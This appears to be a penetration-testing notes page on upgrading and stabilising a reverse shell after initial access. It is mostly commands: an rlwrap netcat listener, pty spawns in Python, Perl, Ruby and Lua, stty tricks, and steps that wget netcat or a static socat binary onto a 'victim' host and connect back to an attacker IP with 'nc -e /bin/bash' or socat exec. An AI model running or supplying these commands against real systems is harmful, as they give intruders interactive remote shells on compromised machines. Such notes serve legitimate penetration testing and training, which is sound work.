Shell Balancing

after initial access into machine we need to stable our shell so there are various ways to do this we will be looking over them ..

Example of Bad shell

Upgrade reverse shell to fully usable TTY shell

rlwrap

During reciving connection form target machine we can use rlwrap
we can also mitigate some of the restrictions of poor netcat shells by wrapping the netcat listener with the rlwrap command.
This is not installed by default so we need to install it using sudo apt rlwrap.

rlwrap nc -lvnp $port

Using env-call and script

This is a generic shell command that receive the default system shell.

SHELL=/bin/bash script -q /dev/null

Using Script

script comes pre-installed
check the man page
-q is for quite , -c is for command

/usr/bin/script -qc /bin/bash /dev/null

ctrl+z

stty raw -echo; fg; reset

Python

Python is great tool for balancing the shell.

 # on victum machine
python -c 'import pty;pty.spawn("/bin/bash")' 
python3 -c 'import pty;pty.spawn("/bin/bash")'

ctrl+z

# on attacker machine
stty raw -echo    
fg

# on victum machine
reset    
export SHELL=bash
export TERM=xterm-256color
stty rows <num> columns <cols>

Perl

If python is not installed or perl avilable on box then we can use this .

perl -e 'exec "/bin/sh";'	#

Ruby

if ruby is installed on box.

exec "/bin/sh"        

ruby -e 'exec "/bin/sh"'

Lua

lua -e "os.execute('/bin/sh')"

Copy over NC and spawn a shell

Using wget and python's SimpleHttpServer NC was easily moved over to the target
here we copy nc to victum machine and then receive the shell.

# Attacker Machine

cp /usr/bin/nc . ; python -m SimpleHttpServer 9998               
nc -nlvp 9998

# Victum Machine

cd /tmp; wget http://10.x.x.x:9998/nc; chmod +x nc
./nc 10.x.x.x 9998 -e /bin/bash

Socat

never sue nc while receiving connections ,use socat it will give you more generic shell like ssh.

# Attacker Machine

socat file:`tty`,raw,echo=0 TCP-L:1234

# Victum Machine

    
/tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:1234    

# if socat not preasent then we can use the binary 

wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:1234

Resource - https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat

PreviousPost Exploitation NextGetting Comfortable with kali

Last updated 3 years ago

hashtagExample of Bad shell

hashtagUpgrade reverse shell to fully usable TTY shell

hashtagrlwrap

hashtagUsing env-call and script

hashtagUsing Script

hashtagPython

hashtagPerl

hashtagRuby

hashtagLua

hashtagCopy over NC and spawn a shell

hashtagSocat

Example of Bad shell

Upgrade reverse shell to fully usable TTY shell

rlwrap

Using env-call and script

Using Script

Python

Perl

Ruby

Lua

Copy over NC and spawn a shell

Socat